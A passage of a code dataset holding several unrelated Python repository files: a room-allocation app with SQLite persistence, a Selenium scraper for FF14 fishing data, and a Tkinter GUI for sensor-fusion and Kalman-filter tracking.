1]]\nprint(la_place(a))\n","repo_name":"remles1/Matrix-determinant-laplace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17338586965","text":"import os\nimport sys\nfrom os import path\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom tools.tools import *\nfrom termcolor import cprint\n\nfrom modules.database import Base, People, Rooms, Unallocated\nfrom modules.people import Fellow, Person, Staff\nfrom modules.rooms import LivingSpace, Office, Room\n\n\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\n\nclass Dojo():\n\n \"\"\"Contains functions to create rooms, add people, and\n printing room allocations\n \"\"\"\n\n # initialises the class\n\n def __init__(self):\n self.offices = []\n self.living_spaces = []\n self.office_unallocated = []\n self.living_unallocated = []\n\n def add_person(self, person_name, person_role, accommodation=\"N\"):\n \"\"\"Creates people and assigns them a room. Adds them to the unallocated\n list if no rooms exist\"\"\"\n\n random_office = random_empty_room(self.offices)\n random_livingspace = random_empty_room(self.living_spaces)\n if person_role == \"fellow\":\n person = Fellow(person_name, accommodation)\n elif person_role == \"staff\":\n person = Staff(person_name)\n else:\n print(\"Role \" + str(person_role) + \" is not recognised\")\n return \"Wrong person role\"\n\n # Add to unallocated if all rooms are full\n\n add_to_office = True\n add_to_living = True\n if random_office == \"Full\":\n self.office_unallocated.append(person)\n add_to_office = False\n print(str(person_name) + \" added to office waiting list\")\n if random_livingspace == \"Full\":\n self.living_unallocated.append(person)\n add_to_living = False\n print(str(person_name) + \" added to living space waiting list\")\n\n # Add to room\n\n if add_to_office:\n random_office.add_occupant(person)\n person.office_name = random_office.name\n print(str(person_name) + \" added to Office \" +\n random_office.name)\n\n if isinstance(person, Staff):\n print(\"No living space allocated\")\n return \"Cannot add staff to living space\"\n\n if not person.accommodation == \"Y\":\n return \"Person not allocated a living space\"\n\n if add_to_living:\n if person.accommodation == \"Y\":\n random_livingspace.add_occupant(person)\n person.living_space_name = random_livingspace.name\n print(str(person_name) + \" added to Living Space \" +\n random_livingspace.name)\n\n def create_room(self, room_type, room_names):\n \"\"\"Calls the room creator method with room type and an array\n of room names as arguments\"\"\"\n\n room_types = [\"office\", \"living_space\"]\n if room_type not in room_types:\n cprint(\" \" + room_type + \" is not a valid room type.\", \"red\")\n return \"Wrong room type\"\n\n for room_name in room_names:\n self.room_creator(room_type, room_name)\n\n if room_type == \"office\":\n assign_unallocated(self.office_unallocated,\n self.offices)\n elif room_type == \"living_space\":\n assign_unallocated(self.living_unallocated,\n self.living_spaces)\n\n cprint(\"\\n Offices quantity: \" + str(len(self.offices)) +\n \"\\n Living Spaces: \" + str(len(self.living_spaces)) +\n \"\\n\", \"green\")\n\n def room_creator(self, room_type, room_name):\n \"\"\"Creates rooms; either offices or living spaces and appends\n it to either office_array or living_space_array\"\"\"\n\n all_rooms = self.offices + 
self.living_spaces\n room_names = [room.name for room in all_rooms]\n for name in room_names:\n if name.upper() == room_name.upper():\n cprint(\"Room named \" + room_name + \" already exists\", \"red\")\n return \"Room exists\"\n\n # Create office or living_space\n\n if room_type == \"office\":\n new_room = Office(room_name)\n self.offices.append(new_room)\n\n elif room_type == \"living_space\":\n new_room = LivingSpace(room_name)\n self.living_spaces.append(new_room)\n\n else:\n cprint(\"\\n The room type \" + room_type + \" is not in system\",\n \"red\")\n return \"Wrong room type\"\n\n cprint(\"\\n Created \" + new_room.type + \" \" + room_name, \"green\")\n return \"Created Successfully\"\n\n def print_room(self, room_name):\n \"\"\"Prints occupants in room with name parsed as argument\"\"\"\n\n merged_array = self.offices + self.living_spaces\n\n if merged_array:\n strings = []\n for room in merged_array:\n\n if room_name == room.name:\n strings.append(\"\\nAllocation: \\n\")\n strings.append(\"\\tRoom Name: \" + room_name +\n \" (\" + room.type + \").\\n\")\n\n strings.append(people_string(room.occupants))\n\n strings.append(\"\\n\")\n return ''.join(strings)\n\n return \"Room doesnt exist\"\n\n else:\n return (\"\\n There are no rooms to print\\n\")\n\n def print_allocations(self, output):\n \"\"\"Returns a string with all allocations in office and living_spaces\"\"\"\n\n strings = []\n strings.append(\"\\nALLOCATIONS: \\n\")\n strings.append(\"\\tOFFICES\\n\")\n strings.append(\"\\t---------\")\n\n # Generate string with information on office occupants\n\n if self.offices:\n for office in self.offices:\n strings.append(\"\\n\\tOffice Name: \" + office.name + \"\\n\")\n strings.append(people_string(office.occupants))\n else:\n strings.append(\"\\n\\tThere are no offices in the system\\n\")\n\n strings.append(\"\\n\\tLIVING SPACES\\n\")\n strings.append(\"\\t----------------\")\n\n # Generate string with information on living space occupants\n\n if self.living_spaces:\n for living_space in self.living_spaces:\n strings.append(\"\\n\\tLiving Space Name:\" +\n living_space.name + \"\\n\")\n strings.append(people_string(living_space.occupants))\n else:\n strings.append(\"\\n\\tThere are no living spaces in the system\\n\")\n\n strings.append(\"\\n\")\n string = ''.join(strings)\n\n # returns the string to be printed to console or creates txt file\n # and writes to it.\n\n if output is None:\n return string\n\n else:\n file_name = \"output/\" + output\n with open(file_name, 'w') as file_output:\n file_output = open(file_name, \"w\")\n file_output.write(string)\n file_output.close()\n return \"File saved to \" + file_name + \".\"\n\n def print_unallocated(self, output):\n \"\"\"Returns all unallocated persons either printed to console or\n to text file\"\"\"\n\n strings = []\n strings.append(\"\\nUNALLOCATED: \\n\")\n\n strings.append(\"\\tOFFICES\\n\")\n strings.append(\"\\t---------\\n\")\n strings.append(people_string(self.office_unallocated))\n\n strings.append(\"\\n\\tLIVING SPACES\\n\")\n strings.append(\"\\t---------------\\n\")\n strings.append(people_string(self.living_unallocated))\n\n string = ''.join(strings)\n\n if output is None:\n return string\n\n else:\n file_name = \"output/\" + output\n with open(file_name, 'w') as file_output:\n file_output = open(file_name, \"w\")\n file_output.write(string)\n file_output.close()\n return \"File saved to path: '\" + file_name + \"'.\"\n\n def reallocate_person(self, person_identifier, room_name):\n \"\"\"Reallocates person to another 
room\"\"\"\n\n if not is_int(person_identifier):\n cprint(\"\\n Id must be an integer, type 'print_allocations' \" +\n \"to view all people's id(s)\", \"red\")\n return \"Not an integer\"\n\n selected_room = \"None\"\n selected_person = \"None\"\n current_room = \"None\"\n merged_array = self.offices + self.living_spaces\n\n # Find room to be reallocated to.\n\n for room in merged_array:\n if room.name == room_name:\n selected_room = room\n break\n\n if not isinstance(selected_room, Room):\n cprint(\" Room doesnt exist\", \"red\")\n return \"Room doesnt exist\"\n\n # Find person to be reallocated and person's current room\n\n if selected_room.type == \"office\":\n for office in self.offices:\n for person in office.occupants:\n if int(person.id_key) == int(person_identifier):\n current_room = office\n selected_person = person\n break\n\n elif selected_room.type == \"living_space\":\n for living_space in self.living_spaces:\n for person in living_space.occupants:\n if int(person.id_key) == int(person_identifier):\n current_room = living_space\n selected_person = person\n break\n\n if not isinstance(selected_person, Person):\n cprint(\" Person is not allocated to any \" +\n selected_room.type + \"s\", \"red\")\n return \"Wrong reallocation\"\n\n # Reallocates person if room_type match, person & room exists and\n # destination is not full\n\n if current_room.name == room_name:\n cprint(\"\\n Person is already in the room\\n\", \"red\")\n return \"Wrong reallocation\"\n\n if current_room.type == selected_room.type:\n\n if selected_room.has_space():\n if selected_room.type == \"office\":\n selected_person.office_name = selected_room.name\n elif selected_room.type == \"living_space\":\n selected_person.living_space_name = selected_room.name\n\n selected_room.add_occupant(selected_person)\n current_room.occupants.remove(selected_person)\n cprint(\"\\n \" + selected_person.name +\n \" has been reallocated to \" +\n selected_room.type + \" \" +\n selected_room.name + \"\\n\", \"green\")\n\n else:\n return \"Destination is full\"\n\n else:\n cprint(\"\\n You have to reallocate to similar room types\" +\n \"\\n\", \"red\")\n return \"Cannot add to room\"\n\n def load_people(self, file_name):\n \"\"\"Loads people from a text file and adds them to rooms\"\"\"\n\n full_file_name = \"input/\" + str(file_name)\n try:\n input_file = open(full_file_name)\n data_list = input_file.readlines()\n\n # Loops through all lines in text file checking for data integrity\n # then calls the add person function to create and assign random\n # room\n\n for data in data_list:\n person_data = data.split()\n\n if len(person_data) >= 3 and len(person_data) <= 4:\n person_name = str(\n person_data[0]) + \" \" + str(person_data[1])\n person_role = str(person_data[2])\n\n if len(person_data) == 4:\n person_accommodation = str(person_data[3])\n else:\n person_accommodation = \"N\"\n\n self.add_person(person_name, person_role,\n person_accommodation)\n else:\n cprint(\"\\n Data is corrupt, check format and try again\",\n \"red\")\n\n input_file.close()\n\n except(FileNotFoundError):\n cprint(\"\\n File not found\\n\", \"red\")\n return \"File not found\"\n\n def save_state(self, database=None):\n \"\"\"Saves data for rooms, persons, and unallocated persons to the sqlite\n database provided, saves to default.db if no database is provided\"\"\"\n\n if database is None:\n database = \"default.db\"\n if os.path.exists(database):\n os.remove(database)\n\n database_name = \"sqlite:///\" + str(database)\n engine = 
create_engine(database_name)\n Base.metadata.bind = engine\n Base.metadata.create_all(engine)\n cprint(\"\\n Database \" + database_name + \" was created successfully\",\n \"green\")\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Add rooms\n\n merged_rooms = self.offices + self.living_spaces\n people_array = []\n for room in merged_rooms:\n room_name = room.name\n room_type = room.type\n db_room = Rooms(room_name, room_type)\n session.add(db_room)\n\n # Filter people to avoid duplicates\n\n for person in room.occupants:\n\n if person not in people_array:\n people_array.append(person)\n\n session.commit()\n\n # Add allocated people\n\n for person in people_array:\n\n person_living_space_name = \"\"\n if person.role == \"fellow\":\n person_living_space_name = person.living_space_name\n elif person.role == \"staff\":\n person_living_space_name = \"None\"\n\n db_person = People(person.name, person.role, person.gender,\n person.age, person.office_name,\n person_living_space_name)\n\n session.add(db_person)\n\n session.commit()\n\n cprint(\" All rooms have been added to the database successfully\",\n \"green\")\n\n # Add unallocated persons\n\n merged_unallocated = self.office_unallocated + self.living_unallocated\n for person in merged_unallocated:\n\n if person in self.office_unallocated:\n room_type = \"office\"\n db_unallocated = Unallocated(person.name, person.role, \"office\",\n person.gender, person.age)\n session.add(db_unallocated)\n\n if person in self.living_unallocated:\n room_type = \"living_space\"\n db_unallocated = Unallocated(person.name, person.role, \"living_space\",\n person.gender, person.age)\n session.add(db_unallocated)\n\n session.commit()\n cprint(\" Unallocated persons have been added to the database\" +\n \"successfully\\n\", \"green\")\n\n if os.path.exists(database):\n return \"Success\"\n\n def load_state(self, database=None):\n \"\"\"Loads data from sqlite database using SQLAlchemy library.\"\"\"\n\n if database is None:\n database = \"default.db\"\n\n # Checks if db file exists.\n temp_office_array = []\n temp_living_array = []\n\n if not os.path.exists(database):\n cprint(\"There is no database named \" + database, \"red\")\n return \"No database\"\n\n database_name = \"sqlite:///\" + str(database)\n engine = create_engine(database_name)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Retrieve rooms if they exist\n\n if session.query(Rooms):\n\n for db_room in session.query(Rooms):\n if db_room.type == \"office\":\n office = Office(db_room.name)\n temp_office_array.append(office)\n cprint(\" Office named \" + office.name + \" retrieved\",\n \"green\")\n elif db_room.type == \"living_space\":\n living_space = LivingSpace(db_room.name)\n temp_living_array.append(living_space)\n cprint(\" Living space name \" +\n living_space.name + \" retrieved\", \"green\")\n\n # Retrieve people if they exist and add them to rooms\n\n if session.query(People):\n\n for person in session.query(People):\n if person.role == \"fellow\":\n\n fellow = Fellow(person.name)\n fellow.office_name = person.office_name\n\n if not person.office_name == \"None\":\n add_to_room(\n fellow, person.office_name,\n temp_office_array)\n\n fellow.living_space_name = person.living_space_name\n if not person.living_space_name == \"None\":\n add_to_room(\n fellow, person.living_space_name,\n temp_living_array)\n\n elif person.role == \"staff\":\n staff = Staff(person.name)\n staff.office_name = person.office_name\n if not person.office_name == \"None\":\n 
add_to_room(\n staff, person.office_name,\n temp_office_array)\n\n cprint(\"\\n Successfully retrieved rooms and occupants\\n\",\n \"green\")\n\n # Check for room conflicts and add rooms based on user input.\n\n self.add_db_rooms(temp_office_array)\n self.add_db_rooms(temp_living_array)\n else:\n cprint(\" There are no rooms in database\", \"yellow\")\n\n # Retrieve unallocated persons if they exist\n\n if session.query(Unallocated):\n\n for person in session.query(Unallocated):\n if person.role == \"fellow\":\n fellow = Fellow(person.name)\n if person.room_type == \"office\":\n self.office_unallocated.append(fellow)\n elif person.room_type == \"living_space\":\n self.living_unallocated.append(fellow)\n if person.role == \"staff\":\n staff = Staff(person.name)\n if person.room_type == \"office\":\n self.office_unallocated.append(staff)\n\n cprint(\" Successfully retrieved unallocated persons\",\n \"green\")\n\n else:\n cprint(\" There are no unallocated people in database\",\n \"yellow\")\n\n def add_db_rooms(self, rooms_array):\n \"\"\"Checks for conflicts between db rooms and system rooms and requests user\n input to either keep system data or overwrite it with database data\"\"\"\n\n merged_array = self.offices + self.living_spaces\n room_to_replace = None\n\n # Checks if room exist\n\n for temp_room in rooms_array:\n room_conflict = False\n\n for room in merged_array:\n dbroom_name = temp_room.name\n if room.name == dbroom_name:\n room_conflict = True\n room_to_replace = room\n break\n\n # If room exists then gives option to keep or overwrite system data\n\n if room_conflict:\n cprint(\"\\n There is conflict. Room named \" +\n dbroom_name + \" exists in system\", \"red\")\n cprint(\" Which would you like to keep?\")\n response = get_input(\n \" Enter ['database'], ['system'] or ['skip'] >> \")\n\n if str(response) == \"database\":\n cprint(\"\\n Overwriting system data with database\\n\",\n \"green\")\n\n if room.type == \"office\":\n self.offices.append(temp_room)\n self.offices.remove(room_to_replace)\n elif room.type == \"living_space\":\n self.living_spaces.append(temp_room)\n self.living_spaces.remove(room_to_replace)\n\n elif str(response) == \"system\":\n cprint(\"\\n Keeping system data\\n\", \"green\")\n\n elif str(response) == \"skip\":\n cprint(\"\\n Keeping default system data\", \"green\")\n return \"Skip\"\n\n else:\n cprint(\" Option: \" + response + \" is not known. \\\n Please type:\\n 'database', 'system' or 'skip'\", \"red\")\n self.add_db_rooms(rooms_array)\n\n else:\n if temp_room.type == \"office\":\n self.offices.append(temp_room)\n elif temp_room.type == \"living_space\":\n self.living_spaces.append(temp_room)\n\n def delete_object(self, del_object, identifier, selector=\"all\"):\n \"\"\"Deletes either room or person. Room's identifier is room name while\n person identifier is his id_key. 
selector gives options to delete from\n the office, living_space or unallocated, or all\"\"\"\n\n merged_array = self.offices + self.living_spaces\n\n if del_object == \"room\":\n\n for room in merged_array:\n if room.name == identifier:\n if room.type == \"office\":\n self.offices.remove(room)\n cprint(\"Office \" + room.name + \" has been \" +\n \" deleted.\", \"green\")\n return \"Success\"\n elif room.type == \"living_space\":\n self.living_spaces.remove(room)\n cprint(\"Room named \" + room.name +\n \" has been deleted from \" + room.type +\n \"s\", \"green\")\n return \"Success\"\n\n elif del_object == \"person\":\n\n if not is_int(identifier):\n cprint(\" To delete a person identifier needs to be an\" +\n \" integer\", \"red\")\n return \"Not integer\"\n\n if selector == \"office\":\n delete_from_room(self.offices, identifier)\n elif selector == \"living_space\":\n delete_from_room(self.living_spaces, identifier)\n elif selector == \"unallocated\":\n self.delete_from_unallocated(\n self.office_unallocated, identifier)\n self.delete_from_unallocated(\n self.living_unallocated, identifier)\n elif selector == \"all\":\n delete_from_room(self.offices, identifier)\n delete_from_room(self.living_spaces, identifier)\n delete_from_unallocated(\n self.office_unallocated, identifier)\n delete_from_unallocated(\n self.living_unallocated, identifier)\n\n else:\n cprint(\"Command not supported, you can only delete 'person'\" +\n \" and 'room'\", \"red\")\n return \"Wrong object\"\n","repo_name":"domiebett/dojo","sub_path":"modules/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":23233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36389104935","text":"#! /usr/bin/env python3\n\nimport asyncio\nimport urllib.parse\n\nimport lxml # type: ignore\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom selenium.common.exceptions import TimeoutException # type: ignore\nfrom selenium.webdriver.chrome.webdriver import WebDriver # type: ignore\nfrom selenium.webdriver.common.by import By # type: ignore\nfrom selenium.webdriver.support.ui import WebDriverWait # type: ignore\nfrom selenium.webdriver.support import expected_conditions # type: ignore\n\nfrom ff14angler.constants.values import (\n ANGLER_BASE_URL,\n ANGLER_PAGE_LOAD_WAIT_DURATION,\n ANGLER_DELAY_BETWEEN_REQUESTS_DURATION\n)\nfrom ff14angler.dataClasses.comment.commentSection import CommentSection\nfrom ff14angler.dataClasses.fish.fish import Fish\nfrom ff14angler.dataClasses.fish.fishProvider import FishProvider\nfrom ff14angler.exceptions.networkException import NetworkException\nfrom ff14angler.scraper.lodestoneImageScraper import LodestoneImageScraper\nfrom ff14angler.network.delayOnReleaseLock import DelayOnReleaseLock\n\n\nclass FishScraper:\n\n @staticmethod\n async def update_fish_with_large_icon_url(driver: WebDriver, fish: Fish):\n if fish.fish_angler_lodestone_url:\n if fish.fish_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {fish}')\n\n fish.fish_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=fish.fish_icon_url,\n lodestone_url=fish.fish_angler_lodestone_url\n )\n\n @staticmethod\n async def update_fish_desynthesis_items_with_large_icon_url(driver: WebDriver, fish: Fish):\n for desynthesis_item in fish.fish_angler_desynthesis_items:\n if desynthesis_item.desynthesis_angler_lodestone_url:\n if desynthesis_item.desynthesis_icon_url is None:\n raise ValueError(f'Missing icon url from 
xivapi: {desynthesis_item}')\n\n desynthesis_item.desynthesis_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=desynthesis_item.desynthesis_icon_url,\n lodestone_url=desynthesis_item.desynthesis_angler_lodestone_url\n )\n\n @staticmethod\n async def update_fish_involved_recipes_with_large_icon_url(driver: WebDriver, fish: Fish):\n for recipe in fish.fish_angler_involved_recipes:\n if recipe.recipe_angler_lodestone_url:\n if recipe.recipe_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {recipe}')\n\n recipe.recipe_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=recipe.recipe_icon_url,\n lodestone_url=recipe.recipe_angler_lodestone_url\n )\n\n @classmethod\n async def collect_fish_data(cls, driver: WebDriver):\n fish_url_template = urllib.parse.urljoin(ANGLER_BASE_URL, '/fish/')\n lock = DelayOnReleaseLock(ANGLER_DELAY_BETWEEN_REQUESTS_DURATION)\n\n for fish_id, fish in FishProvider.fish_holder.items():\n angler_url: str = urllib.parse.urljoin(fish_url_template, str(fish_id))\n for attempt in range(3):\n driver.get('about:blank')\n print(f'Scraping page: {angler_url}')\n driver.get(angler_url)\n\n try:\n WebDriverWait(driver, ANGLER_PAGE_LOAD_WAIT_DURATION).until(\n expected_conditions.presence_of_element_located(\n (By.CSS_SELECTOR, 'form.comment_form')\n )\n )\n\n async with lock:\n await asyncio.sleep(2)\n html: str = driver.page_source\n\n await fish.update_fish_with_comment_section(\n await CommentSection.get_comment_section_from_web_driver(driver)\n )\n break\n except (NetworkException, TimeoutException, ValueError,):\n if attempt == 2:\n raise\n\n await fish.update_fish_with_fish_soup(BeautifulSoup(html, lxml.__name__))\n await cls.update_fish_with_large_icon_url(driver, fish)\n await cls.update_fish_desynthesis_items_with_large_icon_url(driver, fish)\n await cls.update_fish_involved_recipes_with_large_icon_url(driver, fish)\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/scraper/fishScraper.py","file_name":"fishScraper.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19927324511","text":"import lib.env as env_\nimport lib.utl as utl_\nimport lib.gui as gui_\nimport tkinter as tk\n\n# ----------------------------\n\nSENSOR_ARRAY = {'2D': ({'name': 's.1', 'noise': ( 2, 2), 'bias': ( 0, 0), 'interval': 500},\n {'name': 's.2', 'noise': ( 3, 3), 'bias': ( 0, 0), 'interval': 600},\n {'name': 's.3', 'noise': ( 5, 5), 'bias': ( 0, 0), 'interval': 700},\n {'name': 's.4', 'noise': ( 2, 2), 'bias': ( 0, 0), 'interval': 900},\n {'name': 's.5', 'noise': ( 5, 5), 'bias': (+20,+20), 'interval': 250},\n {'name': 's.6', 'noise': ( 8, 8), 'bias': (-20,-20), 'interval': 300}),\n \n '3D': ({'name': 's.1', 'noise': ( 2, 2, 2), 'bias': ( 0, 0, 0), 'interval': 500},\n {'name': 's.2', 'noise': ( 3, 3, 3), 'bias': ( 0, 0, 0), 'interval': 600},\n {'name': 's.3', 'noise': ( 5, 5, 5), 'bias': ( 0, 0, 0), 'interval': 700},\n {'name': 's.4', 'noise': ( 2, 2, 2), 'bias': ( 0, 0, 0), 'interval': 900},\n {'name': 's.5', 'noise': ( 5, 5, 5), 'bias': (+20,+20,+20), 'interval': 250},\n {'name': 's.6', 'noise': ( 8, 8, 8), 'bias': (-20,-20,-20), 'interval': 300})}\n\n# ----------------------------\n \nif __name__ == '__main__':\n\n root = gui_.init()\n app = gui_.AppFrame(root, 'virtual testbed: sensor fusion and multi-sensor tracking using standard motion models and 
recursive Bayesian filters', (1250, 800), '')\n main = gui_.TabFrame(app, tk.TOP)\n\n # ----------------------------\n\n tab_T2 = gui_.TabFrame(main, tk.TOP)\n main.add('2D', tab_T2)\n\n # ----------------------------\n\n tab_DF = gui_.TabFrame(tab_T2, tk.LEFT)\n tab_T2.add('Fusion', tab_DF)\n\n # ----------------------------\n\n tab_DF_KF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('KF', tab_DF_KF)\n\n tab_DF_KF_CV = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CV', tab_DF_KF_CV)\n\n tab_DF_KF_CTL = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': -60}, env_.EKF, {})\n tab_DF_KF.add('CT/L60', tab_DF_KF_CTL)\n\n tab_DF_KF_CTR = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': +30}, env_.EKF, {})\n tab_DF_KF.add('CT/R30', tab_DF_KF_CTR)\n\n tab_DF_KF_CA = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CA', tab_DF_KF_CA)\n\n tab_DF_KF_CJ = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CJ, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CJ', tab_DF_KF_CJ)\n\n tab_DF_KF_BM = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.BM, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('Brownian', tab_DF_KF_BM)\n\n # ----------------------------\n\n tab_DF_EKF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('EKF', tab_DF_EKF)\n\n tab_DF_EKF_CTRVp = gui_.FilterFrame(tab_DF_EKF, 1, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_EKF.add('CTRV', tab_DF_EKF_CTRVp)\n\n tab_DF_EKF_CTRAp = gui_.FilterFrame(tab_DF_EKF, 1, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_EKF.add('CTRA', tab_DF_EKF_CTRAp)\n\n tab_DF_UKF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('UKF', tab_DF_UKF)\n\n tab_DF_UKF_CTRVp = gui_.FilterFrame(tab_DF_UKF, 1, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DF_UKF.add('CTRV', tab_DF_UKF_CTRVp)\n\n tab_DF_UKF_CTRAp = gui_.FilterFrame(tab_DF_UKF, 1, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DF_UKF.add('CTRA', tab_DF_UKF_CTRAp)\n\n # ----------------------------\n\n tab_DA = gui_.TabFrame(tab_T2, tk.LEFT)\n tab_T2.add('Association', tab_DA)\n\n # ----------------------------\n\n tab_DA_KF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('KF', tab_DA_KF)\n\n tab_DA_KF_CV = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CV', tab_DA_KF_CV)\n\n tab_DA_KF_CTL = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': -60}, env_.EKF, {})\n tab_DA_KF.add('CT/L60', tab_DA_KF_CTL)\n\n tab_DA_KF_CTR = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': +30}, env_.EKF, {})\n tab_DA_KF.add('CT/R30', tab_DA_KF_CTR)\n\n tab_DA_KF_CA = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CA', tab_DA_KF_CA)\n\n tab_DA_KF_CJ = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CJ, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CJ', tab_DA_KF_CJ)\n\n tab_DA_KF_BM = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.BM, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('Brownian', tab_DA_KF_BM)\n\n # 
----------------------------\n\n tab_DA_EKF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('EKF', tab_DA_EKF)\n\n tab_DA_EKF_CTRVp = gui_.FilterFrame(tab_DA_EKF, 2, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_EKF.add('CTRV', tab_DA_EKF_CTRVp)\n\n tab_DA_EKF_CTRAp = gui_.FilterFrame(tab_DA_EKF, 2, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_EKF.add('CTRA', tab_DA_EKF_CTRAp)\n\n tab_DA_UKF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('UKF', tab_DA_UKF)\n\n tab_DA_UKF_CTRVp = gui_.FilterFrame(tab_DA_UKF, 2, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DA_UKF.add('CTRV', tab_DA_UKF_CTRVp)\n\n tab_DA_UKF_CTRAp = gui_.FilterFrame(tab_DA_UKF, 2, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DA_UKF.add('CTRA', tab_DA_UKF_CTRAp)\n\n # ----------------------------\n\n tab_T3 = gui_.TabFrame(main, tk.TOP)\n main.add('3D', tab_T3)\n\n # ----------------------------\n\n tab_DF3 = gui_.TabFrame(tab_T3, tk.TOP)\n tab_T3.add('Fusion', tab_DF3)\n\n # ----------------------------\n\n tab_DF3_CV = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CV, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CV (6-state)', tab_DF3_CV)\n\n tab_DF3_V = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CYRPRV, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CYRPRV (8-state)', tab_DF3_V)\n\n tab_DF3_CA = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CA, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CA (9-state)', tab_DF3_CA)\n\n tab_DF3_A = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CYRPRA, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CYRPRA (9-state)', tab_DF3_A)\n\n tab_DF3_CJ = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CJ, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CJ (12-state)', tab_DF3_CJ)\n\n # ----------------------------\n\n tab_DA3 = gui_.TabFrame(tab_T3, tk.TOP)\n tab_T3.add('Association', tab_DA3)\n\n # ----------------------------\n\n tab_DA3_CV = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CV, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CV (6-state)', tab_DA3_CV)\n\n tab_DA3_V = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CYRPRV, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CYRPRV (8-state)', tab_DA3_V)\n\n tab_DA3_CA = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CA, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CA (9-state)', tab_DA3_CA)\n\n tab_DA3_A = gui_.FilterFrame(tab_DA3, 